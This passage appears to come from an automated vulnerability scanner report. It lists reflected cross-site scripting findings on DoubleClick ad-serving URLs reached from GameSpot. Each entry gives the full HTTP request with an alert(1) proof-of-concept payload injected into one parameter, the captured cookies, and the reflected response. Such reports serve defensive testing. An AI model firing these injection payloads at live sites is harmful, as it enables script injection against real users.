<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
/adlog/e/r=13369&sg=511584&o=1%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243b35f8"-alert(1)-"3d6c7297d10&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/http://www.gamespot.com/xbox360/action/call-of-juarez-the-cartel/video/6310177?tag=gumballs%3Bimg%3B2");
var fscUrl = url;
var fscUrlClickT
...[SNIP]...

3.317. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [rqid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5996.2496.0512158326521/B5372452.2

Issue detail

The value of the rqid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8b8d0"-alert(1)-"bfd4e74080 was submitted in the rqid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5996.2496.0512158326521/B5372452.2;sz=880x150;pc=cbs511584;click0=http://adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F8b8d0"-alert(1)-"bfd4e74080&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.gamespot.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:40:44 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6853

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
911026/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511584%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F8b8d0"-alert(1)-"bfd4e74080&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/http://www.gamespot.com/xbox360/action/call-of-juarez-the-cart
...[SNIP]...

3.318. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [sg parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5996.2496.0512158326521/B5372452.2

Issue detail

The value of the sg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 21f4e"-alert(1)-"8cacbd8fb3b was submitted in the sg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5996.2496.0512158326521/B5372452.2;sz=880x150;pc=cbs511584;click0=http://adlog.com.com/adlog/e/r=13369&sg=51158421f4e"-alert(1)-"8cacbd8fb3b&o=1%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.gamespot.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:38:36 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6857

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
/click%3Bh%3Dv8/3af6/17/135/%2a/u%3B240444493%3B0-0%3B0%3B63339386%3B28248-880/150%3B41893239/41911026/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511584%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13369&sg=51158421f4e"-alert(1)-"8cacbd8fb3b&o=1%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAA
...[SNIP]...

3.319. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [site parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5996.2496.0512158326521/B5372452.2

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2f17"-alert(1)-"83eb41c21da was submitted in the site parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5996.2496.0512158326521/B5372452.2;sz=880x150;pc=cbs511584;click0=http://adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253A&h=cn&p=&b=4&l=&site=6d2f17"-alert(1)-"83eb41c21da&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.gamespot.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:39:35 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6857

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
/u%3B240444493%3B0-0%3B0%3B63339386%3B28248-880/150%3B41893239/41911026/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511584%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253A&h=cn&p=&b=4&l=&site=6d2f17"-alert(1)-"83eb41c21da&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=
...[SNIP]...

3.320. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5996.2496.0512158326521/B5372452.2

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2df1"-alert(1)-"f56d955467a was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5996.2496.0512158326521/B5372452.2;sz=880x150;pc=cbs511584;click0=http://adlog.com.com/adlog/e/r=13369c2df1"-alert(1)-"f56d955467a&sg=511584&o=1%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.gamespot.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:38:26 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6857

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
eclick.net/click%3Bh%3Dv8/3af6/17/135/%2a/u%3B240444493%3B0-0%3B0%3B63339386%3B28248-880/150%3B41893239/41911026/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511584%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13369c2df1"-alert(1)-"f56d955467a&sg=511584&o=1%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4A
...[SNIP]...

3.321. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [t parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5996.2496.0512158326521/B5372452.2

Issue detail

The value of the t request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eb486"-alert(1)-"6a17cf53e92 was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5996.2496.0512158326521/B5372452.2;sz=880x150;pc=cbs511584;click0=http://adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34eb486"-alert(1)-"6a17cf53e92&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.gamespot.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:42:26 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6857

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34eb486"-alert(1)-"6a17cf53e92&event=58/http://www.gamespot.com/xbox360/action/call-of-juarez-the-cartel/video/6310177?tag=gumballs%3Bimg%3B2");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg =
...[SNIP]...

3.322. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [b parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5996.2496.0512158326521/B5372452.3

Issue detail

The value of the b request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1678c"-alert(1)-"c45637662c0 was submitted in the b parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5996.2496.0512158326521/B5372452.3;sz=300x250;pc=cbs511581;click0=http://adlog.com.com/adlog/e/r=7108&sg=511581&o=1%253A23236%253A151%253A&h=cn&p=&b=41678c"-alert(1)-"c45637662c0&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.gamespot.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:39:15 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6917

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
40444525%3B0-0%3B0%3B63339400%3B4307-300/250%3B41893241/41911028/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511581%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=7108&sg=511581&o=1%253A23236%253A151%253A&h=cn&p=&b=41678c"-alert(1)-"c45637662c0&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.
...[SNIP]...

3.323. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [cid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5996.2496.0512158326521/B5372452.3

Issue detail

The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98a4a"-alert(1)-"98440cb0d70 was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5996.2496.0512158326521/B5372452.3;sz=300x250;pc=cbs511581;click0=http://adlog.com.com/adlog/e/r=7108&sg=511581&o=1%253A23236%253A151%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=98a4a"-alert(1)-"98440cb0d70&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.gamespot.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:40:14 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6917

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
307-300/250%3B41893241/41911028/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511581%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=7108&sg=511581&o=1%253A23236%253A151%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=98a4a"-alert(1)-"98440cb0d70&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/http://www.gamespot.c
...[SNIP]...

3.324. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [count parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5996.2496.0512158326521/B5372452.3

Issue detail

The value of the count request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 70064"-alert(1)-"ef89b4dccf7 was submitted in the count parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5996.2496.0512158326521/B5372452.3;sz=300x250;pc=cbs511581;click0=http://adlog.com.com/adlog/e/r=7108&sg=511581&o=1%253A23236%253A151%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=70064"-alert(1)-"ef89b4dccf7&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.gamespot.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:41:56 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6917

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
com/adlog/e/r=7108&sg=511581&o=1%253A23236%253A151%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=70064"-alert(1)-"ef89b4dccf7&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/http://www.gamespot.com/xbox360/action/call-of-juarez-the-cartel/video/6310177?tag=gumballs%3Bimg%3B2");
var fscUrl = url
...[SNIP]...

3.325. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [cpnmodule parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5996.2496.0512158326521/B5372452.3

Issue detail

The value of the cpnmodule request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d88d7"-alert(1)-"3791f88907e was submitted in the cpnmodule parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5996.2496.0512158326521/B5372452.3;sz=300x250;pc=cbs511581;click0=http://adlog.com.com/adlog/e/r=7108&sg=511581&o=1%253A23236%253A151%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=d88d7"-alert(1)-"3791f88907e&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.gamespot.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:41:43 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6917

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
og.com.com/adlog/e/r=7108&sg=511581&o=1%253A23236%253A151%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=d88d7"-alert(1)-"3791f88907e&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/http://www.gamespot.com/xbox360/action/call-of-juarez-the-cartel/video/6310177?tag=gumballs%3Bimg%3B2");
var fscUr
...[SNIP]...

3.326. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [e parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5996.2496.0512158326521/B5372452.3

Issue detail

The value of the e request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 16d91"-alert(1)-"fe9314ae6fa was submitted in the e parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5996.2496.0512158326521/B5372452.3;sz=300x250;pc=cbs511581;click0=http://adlog.com.com/adlog/e/r=7108&sg=511581&o=1%253A23236%253A151%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=16d91"-alert(1)-"fe9314ae6fa&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.gamespot.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:40:33 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6917

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
0%3B41893241/41911028/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511581%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=7108&sg=511581&o=1%253A23236%253A151%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=16d91"-alert(1)-"fe9314ae6fa&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/http://www.gamespot.com/xbox360
...[SNIP]...

